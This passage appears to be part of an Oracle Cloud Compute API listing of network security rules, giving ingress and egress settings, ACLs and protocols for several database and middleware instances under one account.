'/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_trusted_hosts_dblistener'],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/dblistener'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/dblistener'],
'enabledFlag': False}, {'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/sys_infra2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/sys_infra2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ssh'],
'enabledFlag': True}, {'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_01',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_01',
'description': 'NTAG Digital Evidence Management', 'tags': ['ntagdevm'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_acl_01',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_vnicset_01',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_02',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_02',
'description': 'NTAG Digital Evidence Management', 'tags': ['ntagdevm'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_acl_01', 'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_vnicset_01', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_pfset_01'],
'secProtocols': ['/oracle/public/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_http',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_http',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/http'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dbexpress',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dbexpress',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/dbexpress'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_02',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_02',
'description': 'NAAC CVS Sandbox', 'tags': ['naaccvsb'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_acl_01', 'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_vnicset_01', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_pfset_01'],
'secProtocols': ['/oracle/public/https', '/oracle/public/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_03',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_03',
'description': 'NAAC CVS Sandbox', 'tags': ['naaccvsb'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_acl_01', 'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': None, 'srcIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_pfset_01'],
'dstIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_pfset_01'], 'secProtocols': [],
'enabledFlag': True}, {'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_03',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_03',
'description': 'NTAG Digital Evidence Management', 'tags': ['ntagdevm'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_acl_01', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': None,
'srcIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_pfset_01'],
'dstIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_pfset_01'],
'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_01',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_01',
'description': 'NAAC CVS Sandbox', 'tags': ['naaccvsb'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_acl_01', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_vnicset_01', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/sys_infra2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/sys_infra2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/dblistener'],
'enabledFlag': False}, {'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [],
'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/sys_infra2otd_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/sys_infra2otd_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/ora_otd2ms_chttp',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/ora_otd2ms_chttp',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/chttp'],
'enabledFlag': True}, {'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/ora_otd2ms_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/ora_otd2ms_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/chttps'],
'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/ora_otd2ms_chttp',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/ora_otd2ms_chttp',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/chttp'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_p2admin_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_p2admin_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ahttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_p2admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_p2admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2ms_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2ms_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2ms_chttp',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2ms_chttp',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/chttp'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_sys_ms2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_sys_ms2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2admin_ssh',
'description': None, 'tags': [],
